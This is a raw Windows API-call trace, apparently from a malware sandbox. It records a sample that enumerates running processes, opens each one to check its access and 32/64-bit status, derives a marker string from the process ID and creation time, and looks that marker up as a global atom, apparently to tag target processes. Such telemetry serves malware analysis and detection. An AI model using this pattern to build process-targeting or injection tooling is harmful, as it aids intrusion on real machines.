	[0075.342] CloseHandle (hObject=0x224) returned 1
	[0075.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.342] CloseHandle (hObject=0x224) returned 1
	[0075.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e810, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.342] CloseHandle (hObject=0x224) returned 1
	[0075.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.343] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetLastError () returned 0x5
	[0075.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.344] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.345] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.345] GetLastError () returned 0x5
	[0075.345] GetLastError () returned 0x5
	[0075.345] GetLastError () returned 0x5
	[0075.345] GetLastError () returned 0x5
	[0075.345] GetLastError () returned 0x5
	[0075.345] GetLastError () returned 0x5
	[0075.345] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.346] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetLastError () returned 0x5
	[0075.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.347] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.348] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.348] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.348] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.348] CloseHandle (hObject=0x224) returned 1
	[0075.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.348] CloseHandle (hObject=0x224) returned 1
	[0075.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eab8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.348] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.348] CloseHandle (hObject=0x224) returned 1
	[0075.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0075.443] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.448] CloseHandle (hObject=0x224) returned 1
	[0075.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.449] CloseHandle (hObject=0x224) returned 1
	[0075.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.449] CloseHandle (hObject=0x224) returned 1
	[0075.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.449] CloseHandle (hObject=0x224) returned 1
	[0075.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.450] CloseHandle (hObject=0x224) returned 1
	[0075.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.450] CloseHandle (hObject=0x224) returned 1
	[0075.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728878, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.450] CloseHandle (hObject=0x224) returned 1
	[0075.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.450] CloseHandle (hObject=0x224) returned 1
	[0075.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.451] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.451] CloseHandle (hObject=0x224) returned 1
	[0075.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.451] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.451] CloseHandle (hObject=0x224) returned 1
	[0075.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.451] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.451] CloseHandle (hObject=0x224) returned 1
	[0075.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.451] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.451] CloseHandle (hObject=0x224) returned 1
	[0075.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.452] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.452] CloseHandle (hObject=0x224) returned 1
